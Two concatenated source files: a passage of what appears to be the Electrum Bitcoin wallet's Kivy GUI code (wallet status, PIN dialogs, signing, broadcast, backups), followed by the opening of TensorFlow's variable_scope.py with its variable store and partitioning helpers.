self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
text = self.format_amount(c + x + u + l)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 5*60:
self.pincode_dialog(check_password=self.check_pin_code, on_success=None, on_failure=self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
self.pincode_dialog(
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def toggle_lightning(self):
if self.wallet.has_lightning():
if not bool(self.wallet.lnworker.channels):
warning = _('This will delete your lightning private keys')
d = Question(_('Disable Lightning?') + '\n\n' + warning, self._disable_lightning)
d.open()
else:
self.show_info('This wallet has channels')
else:
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
d = Question(_('Enable Lightning?') + '\n\n' + warning1 + '\n\n' + warning2, self._enable_lightning)
d.open()
def _enable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.init_lightning()
self.show_info(_('Lightning keys have been initialized.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def _disable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.remove_lightning()
self.show_info(_('Lightning keys have been removed.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def password_dialog(self, **kwargs):
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, **kwargs)
self._password_dialog.open()
def pincode_dialog(self, **kwargs):
if self._pincode_dialog is None:
self._pincode_dialog = PincodeDialog()
self._pincode_dialog.init(self, **kwargs)
self._pincode_dialog.open()
def change_password(self, cb):
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.password = new_password
self.show_info(_("Your password was updated"))
on_failure = lambda: self.show_error(_("Password not updated"))
self.password_dialog(
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success, on_failure=on_failure,
is_change=True,
has_password=self.wallet.has_password())
def change_pin_code(self, cb):
if self._pincode_dialog is None:
self._pincode_dialog = PincodeDialog()
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
self._pincode_dialog.init(
self, check_password=self.check_pin_code,
on_success=on_success, on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
self._pincode_dialog.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
new_path = self.wallet.save_backup()
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python import tf2
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
class _PartitionInfo(object):
"""Holds partition info used by initializer functions.
"""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape
of the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for i in xrange(len(full_shape)):
offset = var_offset[i]
shape = full_shape[i]
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(
shape), self.full_shape, len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = tf2.enabled()
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
@tf_export(v1=["resource_variables_enabled"])
def resource_variables_enabled():
"""Returns `True` if resource variables are enabled.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
return _DEFAULT_USE_RESOURCE
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys
and the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True).
When eager execution is enabled this argument is always forced to be
true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError(
"Passed a custom_getter which is not callable: %s" % custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (shape is not None
and isinstance(shape, collections_lib.Sequence)
and not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError(
"Partitioner must be callable, but received: %s" % partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Set trainable value based on synchronization value.
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
